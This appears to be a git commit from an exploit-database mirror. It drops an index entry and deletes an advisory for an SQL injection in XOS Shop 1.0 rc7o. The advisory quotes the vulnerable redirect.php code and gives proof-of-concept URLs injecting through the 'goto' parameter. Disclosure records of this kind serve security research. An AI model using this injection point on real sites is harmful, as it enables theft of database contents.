Updated 01_30_2014
This commit is contained in:
parent
816ac77f08
commit
fe00572dd8
2 changed files with 0 additions and 44 deletions
|
@ -27994,7 +27994,6 @@ id,file,description,date,author,platform,type,port
|
||||||
31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 Directory Traversal and Denial of Service Vulnerabilities",2008-02-12,"Luigi Auriemma",windows,remote,0
|
31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 Directory Traversal and Denial of Service Vulnerabilities",2008-02-12,"Luigi Auriemma",windows,remote,0
|
||||||
31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component 'user_id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
|
31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component 'user_id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
|
||||||
31168,platforms/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 (.EBP) Project File Buffer Overflow",2014-01-24,LiquidWorm,windows,dos,0
|
31168,platforms/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 (.EBP) Project File Buffer Overflow",2014-01-24,LiquidWorm,windows,dos,0
|
||||||
31171,platforms/php/webapps/31171.txt,"XOS Shop 1.0 rc7o (redirect.php, goto param) - SQL Injection Vulnerability",2014-01-24,"JoKeR DZ",php,webapps,80
|
|
||||||
31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80
|
31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80
|
||||||
31174,platforms/php/webapps/31174.txt,"Joomla Komento Extension 1.7.2 - Stored XSS Vulnerabilities",2014-01-24,"High-Tech Bridge SA",php,webapps,80
|
31174,platforms/php/webapps/31174.txt,"Joomla Komento Extension 1.7.2 - Stored XSS Vulnerabilities",2014-01-24,"High-Tech Bridge SA",php,webapps,80
|
||||||
31175,platforms/php/webapps/31175.txt,"Joomla JV Comment Extension 3.0.2 (index.php, id param) - SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80
|
31175,platforms/php/webapps/31175.txt,"Joomla JV Comment Extension 3.0.2 (index.php, id param) - SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80
|
||||||
|
|
Can't render this file because it is too large.
|
|
@ -1,43 +0,0 @@
|
||||||
################################################################################
|
|
||||||
# Exploit Title: XOS Shop_v1.0_rc7o Sql Injection Vulnerability
|
|
||||||
# Date: 23/01/2014
|
|
||||||
# Exploit Author: JoKeR_StEx
|
|
||||||
# Vendor Homepage: http://www.xos-shop.com/
|
|
||||||
# Software Link: http://xos-shop.com/main/index.php/cPath/25/
|
|
||||||
# Version: v1.0 rc7o
|
|
||||||
# Tested on: Windows PHP Version 6.0.0-dev
|
|
||||||
# CVE : [~]
|
|
||||||
##################################################################################
|
|
||||||
|
|
||||||
[-] Description :
|
|
||||||
|
|
||||||
XOS Shop is affected by Sql Injection Vulnerability
|
|
||||||
The Attacker Can inject some MYSQl and exploit it(get content of db)
|
|
||||||
|
|
||||||
[+] VUlnerability :
|
|
||||||
|
|
||||||
Affected File ==> redirect.php
|
|
||||||
Line 47;53
|
|
||||||
|
|
||||||
<?
|
|
||||||
|
|
||||||
switch($_GET['action']){
|
|
||||||
47: case 'url':
|
|
||||||
48: if (isset($_GET['goto']) && xos_not_null($_GET['goto'])) {
|
|
||||||
49: $check_query = xos_db_query("select products_url from " . TABLE_PRODUCTS_DESCRIPTION . " where products_url = '" . xos_db_input($_GET['goto']) . "' limit 1");
|
|
||||||
50: if (xos_db_num_rows($check_query)) {
|
|
||||||
51: xos_redirect('http://' . $_GET['goto'])
|
|
||||||
52: break;
|
|
||||||
53: }
|
|
||||||
?>
|
|
||||||
[-]Exploit
|
|
||||||
|
|
||||||
http://127.0.0.1/Xoshop/shop/redirect.php?action=url&goto='
|
|
||||||
http://127.0.0.1/Xoshop/shop/redirect.php?action=url&goto=[SQLI]
|
|
||||||
|
|
||||||
###################################################################################
|
|
||||||
# Gr33ting's : Asesino04 , Shield Dz , Drr.0ryx & All My Friedns
|
|
||||||
###################################################################################
|
|
||||||
eamil : jokerdz44@yahoo.fr
|
|
||||||
Facebook : fb.me/imadlilong.lasvegas
|
|
||||||
Twitter : @JoKeR_StEx
|
|
Loading…
Add table
Reference in a new issue